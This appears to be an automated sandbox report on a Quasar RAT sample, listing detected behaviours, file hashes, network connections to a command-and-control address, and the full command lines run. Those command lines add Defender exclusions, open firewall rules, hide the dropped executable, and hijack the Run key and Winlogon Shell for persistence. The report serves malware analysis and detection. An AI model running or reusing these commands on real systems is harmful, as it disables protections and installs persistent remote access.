Analysis Overview
SHA256
4e28ad66b65aec82074754e4bd43c37dd55f0fca34ea1fa6dc9f7bbffee01472
Threat Level: Known bad
The file 4e28ad66b65aec82074754e4bd43c37dd55f0fca34ea1fa6dc9f7bbffee01472 was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Modifies Windows Firewall
Executes dropped EXE
ACProtect 1.3x - 1.4x DLL software
Loads dropped DLL
UPX packed file
Unexpected DNS network traffic destination
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-01 05:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-01 05:17
Reported
2023-08-01 05:20
Platform
win10-20230703-en
Max time kernel
41s
Max time network
155s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\4e28ad66b65aec82074754e4bd43c37dd55f0fca34ea1fa6dc9f7bbffee01472.exe
"C:\Users\Admin\AppData\Local\Temp\4e28ad66b65aec82074754e4bd43c37dd55f0fca34ea1fa6dc9f7bbffee01472.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get Domain
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Users\Admin\AppData\Local\Temp\7z.exe
7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\attrib.exe
"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Users\Admin\AppData\Local\Temp\ratt.exe
"ratt.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 7
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 8 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 8 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 8
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 8
C:\Users\Admin\Music\rot.exe
"C:\Users\Admin\Music\rot.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 222.222.67.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 94.131.105.161:12344 | tcp | |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 94.131.105.161:12344 | tcp | |
| NL | 94.131.105.161:12344 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\ratt.bat
| MD5 | 7ea1fec84d76294d9256ae3dca7676b2 |
| SHA1 | 1e335451d1cbb6951bc77bf75430f4d983491342 |
| SHA256 | 9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940 |
| SHA512 | ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317 |
memory/4888-139-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4888-140-0x00000000069F0000-0x0000000006A00000-memory.dmp
memory/4888-141-0x0000000004270000-0x00000000042A6000-memory.dmp
memory/4888-142-0x00000000069F0000-0x0000000006A00000-memory.dmp
memory/4888-143-0x0000000007030000-0x0000000007658000-memory.dmp
memory/4888-144-0x0000000006C10000-0x0000000006C32000-memory.dmp
memory/4888-145-0x0000000006DB0000-0x0000000006E16000-memory.dmp
memory/4888-146-0x0000000007660000-0x00000000076C6000-memory.dmp
memory/4888-147-0x00000000076D0000-0x0000000007A20000-memory.dmp
memory/4888-148-0x0000000007000000-0x000000000701C000-memory.dmp
memory/4888-149-0x0000000007AE0000-0x0000000007B2B000-memory.dmp
memory/4888-150-0x0000000007E30000-0x0000000007EA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rvgqgjfe.uvp.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4888-161-0x00000000069F0000-0x0000000006A00000-memory.dmp
memory/4888-162-0x00000000069F0000-0x0000000006A00000-memory.dmp
memory/4888-166-0x0000000073B10000-0x00000000741FE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 0f5cbdca905beb13bebdcf43fb0716bd |
| SHA1 | 9e136131389fde83297267faf6c651d420671b3f |
| SHA256 | a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060 |
| SHA512 | a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0 |
memory/5004-170-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/5004-171-0x0000000007A80000-0x0000000007DD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 140c242bd2084887f7d9651edbef1b27 |
| SHA1 | ab5520fb33addfa8c7aab19518d2ace1707caffc |
| SHA256 | d667e58b243474e6c2e85596ce24ac7fd1c35a0d344e48ee018ecbda0dc16bc5 |
| SHA512 | fff13910595bfe3341b6afe14eb6b077f0ecfe55097140e9b5433faccf74c141816b3e4689d8d66841ac8ba0496b86ffbfa3d290c3ac94546f138480ae5bbdc1 |
memory/5004-186-0x0000000004C10000-0x0000000004C20000-memory.dmp
memory/5004-184-0x0000000004C10000-0x0000000004C20000-memory.dmp
memory/5004-187-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4268-190-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4268-191-0x0000000004770000-0x0000000004780000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f924404db3e2f377ca972385a606920 |
| SHA1 | 0f57a187132a09f3a448d6d8f2c6d3640b83718a |
| SHA256 | c46fe59bd9d675f65200e3ccfb02105b398e4dc48bcb80537a1a37e34fbf08dc |
| SHA512 | 39a0bdc0aa8accd2b35b0755c0e835a286bb333dc90cb883e7391aabec0b034a9894e109cf05f082828a8f03819638595e48887bb6ce897def31cdafc62168b5 |
memory/4268-203-0x0000000004770000-0x0000000004780000-memory.dmp
memory/4268-206-0x0000000004770000-0x0000000004780000-memory.dmp
memory/4268-207-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4176-210-0x0000000073B10000-0x00000000741FE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7408030782acfd8cd87d99d135f7e34a |
| SHA1 | 4e980bf53204f484bac906d577575f6314b384da |
| SHA256 | 5cd523c82b420b48cb57e87bfa2bccf8aae4d6ffa3ac41ccb8ac4dc2b41cde7d |
| SHA512 | 4effb71ac7f092c20eabedce0a3680487291a1ac5924fb86919addd0e62e7344a582bb2d67f806fa716bcf341b3d5be57e948d6ea238be6af84dc1a0057a20e8 |
memory/4176-222-0x0000000004870000-0x0000000004880000-memory.dmp
memory/4176-225-0x0000000004870000-0x0000000004880000-memory.dmp
memory/4176-226-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4648-229-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4648-230-0x00000000048B0000-0x00000000048C0000-memory.dmp
memory/4648-231-0x00000000048B0000-0x00000000048C0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 94e4c3d058c2a10af449595de8ec9865 |
| SHA1 | 2ace3ce9aa09aa61199f5259dc9cca42eded4ef7 |
| SHA256 | 960ee2c01171da4172150101d7a7356932cbf3fa27ac463719dbc41fff25a50c |
| SHA512 | f3fdd310cb85d6a8baff0ac016c7d79323e390ea15486becdb708deccd4688985c4fb950b667cc2c5e54e40892c6cea065666c7b73f6e651d8a63142d76ebe33 |
memory/4648-243-0x00000000048B0000-0x00000000048C0000-memory.dmp
memory/4648-246-0x00000000048B0000-0x00000000048C0000-memory.dmp
memory/4648-247-0x0000000073B10000-0x00000000741FE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
memory/5032-250-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
C:\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
memory/5032-254-0x0000000010000000-0x00000000100E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.7z
| MD5 | 7de6fdf3629c73bf0c29a96fa23ae055 |
| SHA1 | dcb37f6d43977601c6460b17387a89b9e4c0609a |
| SHA256 | 069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff |
| SHA512 | d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8 |
memory/5032-258-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | f1b4b270779776ce5d8829f66934deac |
| SHA1 | 5df708a5921807b981739ba11d134fe14a7ef309 |
| SHA256 | a58064e5e3c5da62cb678d13ac7cd11632999c593b637598f261bea00f415236 |
| SHA512 | 5a9c57f378adc02acface706849277f2f7a89269c51b9f56158e062ed4df92edd917fa2f2a0e745906db25799fbe245776875892d1d33e3855304ec03546c9e5 |
memory/2444-264-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/2444-265-0x0000000006C20000-0x0000000006C30000-memory.dmp
memory/2444-266-0x0000000007B90000-0x0000000007EE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 680b400dbdbe9b5d2e86ffa228a7303d |
| SHA1 | 7b6d9849a15a766921b7e30414c65bf848155c07 |
| SHA256 | e09aa7ec2e2a586aaf56d4fa1a3dac72e01122768d6c5fb275fac323878a35e9 |
| SHA512 | 508b7be971c2388644b875b96e3b43624f084d531719da6e669f674f0600c0ba39f70b7267b5c632e32ffa1c7641a74220e38b315b0bf574232b2cffa9aa6984 |
memory/2444-268-0x0000000008460000-0x00000000084AB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Add.ps1
| MD5 | 0df43097e0f0acd04d9e17fb43d618b9 |
| SHA1 | 69b3ade12cb228393a93624e65f41604a17c83b6 |
| SHA256 | c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873 |
| SHA512 | 01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb |
memory/2444-291-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/2444-290-0x00000000095F0000-0x0000000009623000-memory.dmp
memory/2444-293-0x000000007EA80000-0x000000007EA90000-memory.dmp
memory/2444-292-0x0000000006C20000-0x0000000006C30000-memory.dmp
memory/2444-294-0x00000000095B0000-0x00000000095CE000-memory.dmp
memory/2444-299-0x0000000009640000-0x00000000096E5000-memory.dmp
memory/2444-300-0x0000000006C20000-0x0000000006C30000-memory.dmp
memory/2444-301-0x0000000009810000-0x00000000098A4000-memory.dmp
memory/2444-494-0x00000000096F0000-0x000000000970A000-memory.dmp
memory/2444-499-0x00000000095D0000-0x00000000095D8000-memory.dmp
memory/2444-524-0x0000000009FB0000-0x000000000A628000-memory.dmp
memory/2444-525-0x0000000009760000-0x000000000977A000-memory.dmp
memory/2444-530-0x00000000097E0000-0x0000000009802000-memory.dmp
memory/2444-531-0x000000000A630000-0x000000000AB2E000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| MD5 | 124cb455e308bd9e6f777782ecce3fea |
| SHA1 | c5897da0e83b95ceefc533099e8ea3f8f91b98f6 |
| SHA256 | 1dac1823911e8ef1bdfba39d3e6ac907656d87e9bbd6fecb550baf822e7fc7dd |
| SHA512 | 0d292b685518222abbffb23d7c48a93bb71a0be0a434f07fb3ce097c0df555c6f304741a572a5501ed1845960e7335aa38555509ff4f412267d869e1a3f39258 |
memory/2444-560-0x000000007EA80000-0x000000007EA90000-memory.dmp
memory/2444-561-0x0000000006C20000-0x0000000006C30000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe
| MD5 | 0e62fbabdaac7d486b9b47b3624a0816 |
| SHA1 | d239009ce40d38db653410f52d0a257f5d3c9224 |
| SHA256 | 3e75f9698ed8461fb828254c9b210822b8cb4731d35fd5bd1f05fc8bb15caf71 |
| SHA512 | a0d0b713c499a5cb335195a0f3aa5dda886a2f6a712ce7f50334135a075d726be71d124b938e5fb25fe840acea107125002fb11e6aea39a3a963e6d8c7ca8f75 |
memory/4908-564-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/4908-563-0x00000000009A0000-0x0000000000B56000-memory.dmp
memory/4908-565-0x0000000004D20000-0x0000000004DBC000-memory.dmp
memory/4908-568-0x0000000004E90000-0x0000000004F22000-memory.dmp
memory/4908-569-0x0000000004FD0000-0x0000000004FE0000-memory.dmp
memory/4908-572-0x0000000004CC0000-0x0000000004D06000-memory.dmp
memory/4908-584-0x0000000004E20000-0x0000000004E2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | a51b281e5e8c49c56887a730684c605b |
| SHA1 | 18261b209a0221e94da5b3c3561503e5c86a1f13 |
| SHA256 | a49f03175d0d3f03704b42ef45425d89c6e5d52284cf1077e28e773e2f2e4072 |
| SHA512 | 17dd01d2cbe06c6ca17efe448c745b9227bff5fe5676a905114927c39eb01b11647bd46706ac99beebcafcb1a473489e01850bb88b31f90853e426a523725280 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log
| MD5 | 9e104e9aa0cfdec0753de24cbe3f587b |
| SHA1 | f63b8d0b29c65e518be6a9412e7499c9de11be78 |
| SHA256 | 59a9f13de0e003ea4adcd0193477f147b0c91ae847eebc744e91a4efe167223f |
| SHA512 | 8253854159ceac2d84eb371c9672730831505dea52ac3bc2cca45ee5308717ca3f11734602d0a409974b137084a8c20e6b7653640991e45708f692c65ac4933b |
C:\Users\Admin\Music\rot.exe
| MD5 | 02eda40e5f4eb5cf877a11493f0e3bbc |
| SHA1 | 8e18a894239260711faa0de0304306efee987123 |
| SHA256 | ab76dba42fc2346e3b19d424a9c4fbd9fbcbb02f347b0b0d57c67a29a8da7384 |
| SHA512 | b927670886c823b7fdd62606189aac56e6c2ab28490374c6f21f07c3706afad4ecc8eb24e7556f231461a8ed1942ceb8293f6701b4315660f7f3a40105e298ab |
C:\Users\Admin\Music\rot.exe
| MD5 | 110c85e95a13168ae418227a2beb2b9b |
| SHA1 | d3e13797aa06638b683d988475d55cfa9a2ff1f3 |
| SHA256 | f40fcfd3fbc91cc26ebff824ad7eff3b913fec7a62e8c0e64082bd987af2e13e |
| SHA512 | bffceea5e8c1033e80832f007fe5fac9be5936c4ab27d64ca05cfe2793c39fb56960bacb7407dfd89d25ebc0ee1d3bd9a241a7d6df220c7783ed65dae49056ab |
C:\Users\Admin\Music\rot.exe
| MD5 | fe6babf8c96d84abcaf0588c0714e4c0 |
| SHA1 | 772e1c16d7dde390c8597c1c449ce9884e1f288a |
| SHA256 | 506731bec35b2a8441b6f81b0f09e83b2823962fc74226a522b923a6ac7aa391 |
| SHA512 | 9c2fb7af54c8f7e2935c4228d5cee4508044aacd29ecf15c995c84c1a76ef1fb44411c625299d3dc9a666e7b099ad10a6892a02f7b681380177dfacd1ae1ad3b |
memory/5068-615-0x0000000000400000-0x000000000045E000-memory.dmp